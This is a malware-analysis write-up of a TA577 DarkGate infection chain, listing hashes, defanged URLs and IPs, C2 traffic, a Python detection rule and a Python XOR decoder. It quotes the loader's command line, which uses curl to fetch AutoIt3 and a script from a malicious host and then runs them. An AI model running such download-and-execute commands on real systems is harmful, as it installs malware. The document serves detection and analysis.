2023-10-13 (FRIDAY) - TA577 DARKGATE INFECTION

REFERENCES:

- https://twitter.com/Cryptolaemus1/status/1712795493703491729
- https://github.com/pr0xylife/DarkGate/blob/main/DarkGate_13.10.2023.txt

INFECTION CHAIN:

- link from email --> downloaded zip --> extracted .js --> .js retrieves & runs autoit3.exe & .au3 script --> DarkGate C2

DOWNLOADED ZIP ARCHIVE AND EXTRACTED JS FILE:

- SHA256 hash: a83cf81aa22b1f453a9bfd0c1d29402b07e6efb86414a707d29442209caf6c89
- File size: 14,568 bytes
- Downloaded from: hxxps[:]//isoowac[.]com/gfie/?R=9028231 --> hxxps[:]//isoowac[.]com/gfie//?redir=1697208976
- File name: uh.zip
- File type: Zip archive data, at least v2.0 to extract, compression method=deflate
- File description: zip archive downloaded from link in email
- Note: random file name and hash each time this is downloaded from the original link

- SHA256 hash: 21cbf06080ae61f95617b3f65f85af5a1390133af6c5c516ac251f9f9cde7fa7
- File size: 36,367 bytes
- File name: De.js
- File type: ASCII text, with very long lines (12414), with CRLF, LF line terminators
- File description: Script file extracted from the above zip archive

COMMAND SCRIPT RUN BY ABOVE JS FILE (MANUALLY PARSED HERE):

  "C:\Windows\System32\cmd.exe" /c cd /d C:\Users\[username]\AppData\Local\Temp &
  curl -o Autoit3.exe hxxp[:]//whoernet[.]co[.]com:80 &
  curl -o imkvef.au3 hxxp[:]//whoernet[.]co[.]com:80/msikatqayts &
  Autoit3.exe imkvef.au3 
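The command line above is a compact detection opportunity: a script host spawns cmd.exe, curl writes an .exe and an .au3 into a user-writable directory, and the AutoIt interpreter is then run from that directory. The following is an added example (not code from the original write-up) of a small triage rule in Python run over constructed Sysmon-style process-creation records; the field names "parent" and "cmdline", the username "alice", and the benign lookalike events are assumptions, and the first record reproduces the command line shown above with the URLs left defanged as on this page.

```python
import re

# Constructed Sysmon-style process-creation records (field names are an assumption).
# Event 0 mirrors the command line shown above with the username filled in as "alice";
# event 1 is the persistence copy under C:\ProgramData; events 2 and 3 are benign lookalikes.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'"C:\Windows\System32\cmd.exe" /c cd /d C:\Users\alice\AppData\Local\Temp & '
                r'curl -o Autoit3.exe hxxp://whoernet.co.com:80 & '
                r'curl -o imkvef.au3 hxxp://whoernet.co.com:80/msikatqayts & Autoit3.exe imkvef.au3'},
    {"parent": r"C:\Windows\explorer.exe",
     "cmdline": r"C:\ProgramData\fcbeckd\Autoit3.exe C:\ProgramData\fcbeckd\fbcbaaf.au3"},
    {"parent": r"C:\Windows\explorer.exe",
     "cmdline": r'"C:\Program Files (x86)\AutoIt3\AutoIt3.exe" C:\Users\bob\scripts\build.au3'},
    {"parent": r"C:\Windows\explorer.exe",
     "cmdline": r"cmd.exe /c curl -o report.json https://api.example.com/status"},
]

# curl writing a file to disk; group 1 is the output file name.
CURL_DOWNLOAD = re.compile(r"\bcurl(?:\.exe)?\s+(?:-o|--output)\s+(\S+)", re.IGNORECASE)
# The AutoIt interpreter invoked with an .au3 script as its argument; group 1 is the script.
AUTOIT_RUN = re.compile(r"(?:^|[\s&\"\\])autoit3(?:\.exe)?\"?\s+(\S+\.au3)\b", re.IGNORECASE)
# Staging directories a standard user can write to, as seen in the file locations above.
USER_WRITABLE = re.compile(r"\\(?:AppData\\Local\\Temp|ProgramData|Users\\Public)(?:\\|\s|$)",
                           re.IGNORECASE)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}


def score_event(ev):
    """Return the reasons an event matches the loader chain; an empty list means no match."""
    cmd = ev.get("cmdline", "")
    parent = ev.get("parent", "").rsplit("\\", 1)[-1].lower()
    reasons = []
    downloads = [m.group(1) for m in CURL_DOWNLOAD.finditer(cmd)]
    if downloads and parent in SCRIPT_HOSTS:
        reasons.append(f"curl download launched from script host {parent}")
    payloads = [d for d in downloads if d.lower().endswith((".exe", ".au3", ".dll"))]
    if payloads:
        reasons.append("curl writes executable or AutoIt content: " + ", ".join(payloads))
    m = AUTOIT_RUN.search(cmd)
    if m:
        reasons.append(f"AutoIt3 interpreter invoked with script {m.group(1)}")
    if reasons and USER_WRITABLE.search(cmd):
        reasons.append("paths under a user-writable staging directory")
    return reasons


def is_suspicious(ev, threshold=2):
    """Require two independent signals, so a developer running AutoIt from Program Files is not flagged."""
    return len(score_event(ev)) >= threshold


def triage(events):
    """Indices of events that cross the threshold, suitable for raising an alert."""
    return [i for i, ev in enumerate(events) if is_suspicious(ev)]


if __name__ == "__main__":
    for i in triage(SAMPLE_EVENTS):
        print(i, score_event(SAMPLE_EVENTS[i]))
```

The threshold matters: the AutoIt interpreter on its own is legitimate software (as noted for the copy of Autoit3.exe below), so the rule only fires when the interpreter run is paired with a download from a script host, a downloaded .exe/.au3, or a staging directory such as %TEMP% or C:\ProgramData.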

INITIAL FILES FOR THE INFECTION:

- SHA256 hash: 237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d
- File size: 893,608 bytes
- File location: hxxp[:]//whoernet[.]co[.]com/
- File location: C:\Users\[username]\AppData\Local\Temp\Autoit3.exe
- File location: C:\ProgramData\fcbeckd\Autoit3.exe
- File type: PE32 executable (GUI) Intel 80386, for MS Windows
- File description: Copy of Autoit3.exe, version 3.3.14.5
- Note: This is not an inherently malicious file

- SHA256 hash: 7f78ffb9ab7c20714b03e1d58497182c700ad8bda9dfe2a0af39b470cdf39620
- File size: 113,625 bytes
- File location: hxxp[:]//whoernet[.]co[.]com/msikatqayts
- File location: C:\Users\[username]\AppData\Local\Temp\imkvef.au3
- File location: C:\ProgramData\fcbeckd\fbcbaaf.au3
- File type: data
- File description: .au3 file run by Autoit3.exe for DarkGate infection

- SHA256 hash: 2aac9ce0afa3628a39946ffb61bf36d195cd478afc25ac0b67cafbf0ca071d99
- File size: 396,296 bytes
- File location: hxxp[:]//whoernet[.]co[.]com/icumzj
- File type: data
- File description: XOR-encoded binary retrieved by .au3 file
- String used for XOR encoding: MwjGWzOH

- SHA256 hash: a1aec4ee66c9a6d87ffdb3fc93ee0becd586ebf4799497dd2159e1d122bb83fd
- File size: 396,288 bytes
- File name: 2023-10-13-decoded-EXE-retrieved-by-au3-script.bin
- File type: PE32 executable (GUI) Intel 80386, for MS Windows
- File description: Decoded EXE file from the above XOR-encoded binary
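The encoded blob retrieved from /icumzj is 396,296 bytes and the decoded EXE is 396,288 bytes, a difference of 8 bytes, which is also the length of the key string MwjGWzOH; the page does not say where those extra bytes sit. The following is an added example in Python (not the analyst's decoder, and not DarkGate's own routine) of a repeating-key XOR decoder that does not assume a layout: it tries each candidate start offset and each key phase, validates the candidate cheaply on the DOS header and the PE signature at e_lfanew before decoding the remainder, and runs here against a constructed fake PE image encoded in two assumed layouts.

```python
import struct

KEY = b"MwjGWzOH"  # XOR key string reported on this page


def xor_repeating(data: bytes, key: bytes, phase: int = 0) -> bytes:
    """XOR data with key cycled starting at key[phase]; XOR is its own inverse, so this encodes and decodes."""
    klen = len(key)
    return bytes(b ^ key[(i + phase) % klen] for i, b in enumerate(data))


def looks_like_pe(buf: bytes) -> bool:
    """Minimal PE sanity check: MZ magic plus a PE\\0\\0 signature at e_lfanew (offset 0x3C)."""
    if len(buf) < 0x40 or buf[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", buf, 0x3C)[0]
    return 0x40 <= e_lfanew <= len(buf) - 4 and buf[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def recover_pe(blob: bytes, key: bytes, max_skip: int = 64):
    """
    Search blob for an XOR-encoded PE. For each candidate start offset (skip) and key phase,
    decode only the 0x40-byte DOS header, then only the 4 signature bytes at e_lfanew, and
    decode the whole remainder only when both check out. Returns (skip, phase, decoded) or None.
    """
    klen = len(key)
    for skip in range(min(max_skip, max(len(blob) - 0x40, 0)) + 1):
        for phase in range(klen):
            header = xor_repeating(blob[skip:skip + 0x40], key, phase)
            if header[:2] != b"MZ":
                continue
            e_lfanew = struct.unpack_from("<I", header, 0x3C)[0]
            if not (0x40 <= e_lfanew <= len(blob) - skip - 4):
                continue
            # Byte j of blob[skip:] uses key[(j + phase) % klen], so the signature slice starts at phase + e_lfanew.
            sig = xor_repeating(blob[skip + e_lfanew:skip + e_lfanew + 4], key, (phase + e_lfanew) % klen)
            if sig != b"PE\0\0":
                continue
            decoded = xor_repeating(blob[skip:], key, phase)
            if looks_like_pe(decoded):
                return skip, phase, decoded
    return None


def build_fake_pe() -> bytes:
    """Constructed stand-in for a PE image: a DOS header whose e_lfanew points at a PE signature at 0x80."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x80)
    return bytes(dos) + b"\x00" * 0x40 + b"PE\0\0" + bytes(range(256))


FAKE_PE = build_fake_pe()
# Layout A (assumption): 8 unencoded header bytes, then the PE encoded with the key starting at phase 0.
BLOB_A = b"\x00" * 8 + xor_repeating(FAKE_PE, KEY)
# Layout B (assumption): the whole blob encoded from byte 0, with 5 junk bytes in front of the PE.
BLOB_B = xor_repeating(b"\x01\x02\x03\x04\x05" + FAKE_PE, KEY)

if __name__ == "__main__":
    # For the real sample: recover_pe(open("icumzj", "rb").read(), KEY)
    for name, blob in (("A", BLOB_A), ("B", BLOB_B)):
        result = recover_pe(blob, KEY)
        print(name, None if result is None else (result[0], result[1], len(result[2])))
```

Checking the header before decoding the full buffer keeps the search cheap even on a 400 KB blob, and demanding the PE signature at e_lfanew rather than just "MZ" keeps a chance two-byte collision from producing a false hit.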

INFECTION TRAFFIC:

ZIP ARCHIVE DOWNLOAD:

- 63.250.38[.]3 port 443 - hxxps[:]//isoowac[.]com/gfie/?R=9028231
- 63.250.38[.]3 port 443 - hxxps[:]//isoowac[.]com/gfie//?redir=1697208976

DARKGATE LOADER INFECTION TRAFFIC:

- 212.113.118[.]178 port 80 - whoernet[.]co[.]com - GET /
- 212.113.118[.]178 port 80 - whoernet[.]co[.]com - GET /msikatqayts
- 212.113.118[.]178 port 80 - whoernet[.]co[.]com - GET /icumzj

POST-INFECTION DARKGATE C2 TRAFFIC:

- 212.113.118[.]178 port 80 - whoernet[.]co[.]com - POST / HTTP/1.0 
- 212.113.118[.]178 port 8080 - attempted TCP connections
